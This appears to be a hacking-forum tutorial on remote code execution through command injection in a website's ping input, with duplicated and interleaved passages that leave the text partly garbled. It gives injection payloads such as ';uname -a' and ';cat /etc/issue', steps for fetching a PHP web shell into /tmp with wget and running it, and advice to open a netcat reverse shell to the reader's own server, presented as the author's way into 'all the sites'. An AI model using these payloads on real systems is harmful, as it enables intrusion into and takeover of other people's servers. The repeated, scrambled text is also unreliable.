Search
Latest topics
Who is online?
In total there are 2 users online :: 0 Registered, 0 Hidden and 2 Guests None
Most users ever online was 38 on Sun Mar 19, 2023 10:07 pm
Most Viewed Topics
[Tutorial][HQ] Remote Code Execution [Noob Friendly]
Page 1 of 1
[Tutorial][HQ] Remote Code Execution [Noob Friendly]
Disclaimer
I am not responsible for how you use this tutorial its was created for educational purposes.
Intro
Hello guys and welcome to my tutorial on Remote Code Execution (RCE),
I will not be providing any real targets but will be providing a realistic example,
RCE is a very useful exploit as it lets you execute direct commands to the system,
Therefore allowing us to upload files, delete files and manipulate the system how we wish.
How RCE happens
RCE most commonly happens via unsanitized input on a website input,
For example in this tutorial we will be using a ping IP input shown in the image below.
[You must be registered and logged in to see this image.]" />
The following image will show the output of what we have entered.
[You must be registered and logged in to see this image.]" />
[You must be registered and logged in to see this link.]" />
I am not responsible for how you use this tutorial its was created for educational purposes.
Intro
Hello guys and welcome to my tutorial on Remote Code Execution (RCE),
I will not be providing any real targets but will be providing a realistic example,
RCE is a very useful exploit as it lets you execute direct commands to the system,
Therefore allowing us to upload files, delete files and manipulate the system how we wish.
How RCE happens
RCE most commonly happens via unsanitized input on a website input,
For example in this tutorial we will be using a ping IP input shown in the image below.
[You must be registered and logged in to see this image.]" />
Check target
Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a
By adding ";" this is a concatenate "Joins an extra command to supplied argument"Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a
The following image will show the output of what we have entered.
Check target
Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a
By adding ";" this is a concatenate "Joins an extra command to supplied argument"
The following image will show the output of what we have entered.
[You must be registered and logged in to see this image.]" />Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a
By adding ";" this is a concatenate "Joins an extra command to supplied argument"
The following image will show the output of what we have entered.
Okay so now what
Okay so we have found that via the input we have been able to execute a Nix* command to display box info,
Now what else is there we can do hmm... Okay lets try pull up what os the box is running with the following command,
Code:
;cat /etc/issue
This command has provided us the info of the boxes OS as shown below
Okay so we have found that via the input we have been able to execute a Nix* command to display box info,
Now what else is there we can do hmm... Okay lets try pull up what os the box is running with the following command,
Code:
;cat /etc/issue
This command has provided us the info of the boxes OS as shown below
[You must be registered and logged in to see this image.]" />
Well that was cool
Okay so we now found some minor useless info,
I am sure you are thinking no more minor stuff lets move on to get "r00t".
Now lets try list the current directory with "ls".
[You must be registered and logged in to see this image.]" />Okay so we now found some minor useless info,
I am sure you are thinking no more minor stuff lets move on to get "r00t".
Now lets try list the current directory with "ls".
We have got no output!?! I guess its not that vulnerable lets move on shall we...
WRONG! Just means the current directory is not able to be listed.
As shown before ";" is for concatenate so lets try join 2 commands by doing the following to move up a directory then list.
Code:
;cd ..;ls
[You must be registered and logged in to see this image.]" />WRONG! Just means the current directory is not able to be listed.
As shown before ";" is for concatenate so lets try join 2 commands by doing the following to move up a directory then list.
Code:
;cd ..;ls
Success we listed the directories. +1 to you sir!
Now its a wide known fact that the tmp directory is usually writeable so lets navigate there and list by entering the following code.
Code:
;cd [You must be registered and logged in to see this image.]" />..;cd tmp;ls
Now its a wide known fact that the tmp directory is usually writeable so lets navigate there and list by entering the following code.
Code:
;cd [You must be registered and logged in to see this image.]" />..;cd tmp;ls
Woo! We listed a writable director now lets try wget a shell to this directory by entering this code;
Code:
;cd ..;cd tmp;wget [You must be registered and logged in to see this link.] > a.php
Code:
;cd ..;cd tmp;wget [You must be registered and logged in to see this link.] > a.php
[You must be registered and logged in to see this link.]" />
Now your shell has been uploaded you could access the shell via terminal by entering,
Code:
;cd ..;cd tmp;php a.php
Alternative to a web shell
Okay so my favourite way of gaining access to all the sites is the following way,
Test for vulnerable input and instead of executing a bunch of system commands try to spawn a shell and back connect via netcat on a VPS.
now for the actual codes to spawn a shell on the server I suggest trying the following examples they have always served me well;
[You must be registered and logged in to see this link.]
Obviously change "10.0.0.1" to your VPS IP and change the port I suggest using port 443 as its commonly open.
From there for ease of use I will normally spawn a (Pseudo Terminal) PTY shell from bash by using the following code
Code:
;python -c 'import pty; pty.spawn("/bin/bash")'
Tutorial written 100% by me.
I really hope that you enjoyed this tutorial as much as I enjoyed writing it!
Thanks for reading guys.
Code:
;cd ..;cd tmp;php a.php
Alternative to a web shell
Okay so my favourite way of gaining access to all the sites is the following way,
Test for vulnerable input and instead of executing a bunch of system commands try to spawn a shell and back connect via netcat on a VPS.
now for the actual codes to spawn a shell on the server I suggest trying the following examples they have always served me well;
[You must be registered and logged in to see this link.]
Obviously change "10.0.0.1" to your VPS IP and change the port I suggest using port 443 as its commonly open.
From there for ease of use I will normally spawn a (Pseudo Terminal) PTY shell from bash by using the following code
Code:
;python -c 'import pty; pty.spawn("/bin/bash")'
Tutorial written 100% by me.
I really hope that you enjoyed this tutorial as much as I enjoyed writing it!
Thanks for reading guys.
Similar topics
» [TUTORIAL] Hack any IPhone/Android/Blackberry Phone [TUTORIAL]
» Remote File Inclusion (RFI)
» How to remote shutdown on a computer through ip address
» Tutorial Cryptography Basics and Algorithmic Attacks
» [DETAILED][NOOB-FRIENDLY][PICTURES]How To Bypass Any Android Pattern/Word Lockscreen!
» Remote File Inclusion (RFI)
» How to remote shutdown on a computer through ip address
» Tutorial Cryptography Basics and Algorithmic Attacks
» [DETAILED][NOOB-FRIENDLY][PICTURES]How To Bypass Any Android Pattern/Word Lockscreen!
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Tue Feb 02, 2021 7:12 am by manas41
» SQL injection and Quote escaping
Sun Jun 28, 2015 11:42 am by ADS1
» [TUT] Chmod: Files & Permissions [TUT]
Thu Jun 04, 2015 12:45 pm by Guest
» Reaver pixiewps
Thu Jun 04, 2015 12:23 pm by voidfletcher
» How To Crash Someone's Skype in 10 SECONDS
Thu Jun 04, 2015 12:20 pm by voidfletcher
» Internet Security & IP Security (IPSec)
Mon May 18, 2015 9:00 pm by voidfletcher
» [Python] Infinite / Definite File Generator
Mon May 18, 2015 8:58 pm by ADS1
» [C#] String Case-Inversion
Mon May 18, 2015 8:57 pm by ADS1
» Rekall Memory Forensic Framework
Sat May 16, 2015 8:55 pm by ADS1